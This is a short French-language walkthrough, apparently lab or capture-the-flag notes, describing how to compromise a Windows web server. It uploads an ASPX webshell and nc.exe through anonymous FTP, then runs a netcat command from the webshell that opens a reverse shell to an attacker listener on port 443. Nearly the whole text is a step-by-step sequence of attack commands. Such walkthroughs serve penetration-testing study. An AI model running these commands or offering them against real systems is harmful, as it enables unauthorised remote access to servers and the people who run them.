FTP - Reverse Shell (Webshell) Attack

Exploitation - Reverse Shell via FTP

Nous utilisons une webshell préexistante, cmd.aspx, provenant de SecLists :

locate cmd.aspx
cp /usr/share/davtest/backdoors/aspx_cmd.aspx .

Ensuite, nous l’importons sur le serveur FTP :

ftp 10.10.10.5
anonymous
put aspx_cmd.aspx

Nous accédons à la webshell via le serveur HTTP et exécutons des commandes, par exemple :

ipconfig

Nous téléchargeons nc.exe depuis SecLists :

locate nc.exe 
cp /usr/share/SecLists/Web-Shells/FuzzDB/nc.exe .

Puis, nous l’ajoutons sur le serveur FTP :

ftp 10.10.10.5
anonymous
put nc.exe

À partir de la webshell, nous localisons le fichier nc.exe sur le serveur cible:

dir /s C:\nc.exe

Écoute sur le port 443 :

Nous avons mis en place un listener avec nc pour écouter sur le port 443 :

rlwrap nc -nvlp 443

Depuis la machine cible, nous exécutons la commande suivante via la webshell :

C:\inetpub\wwwroot\nc.exe -e cmd 10.10.14.26 443

Mis à jour il y a 1 an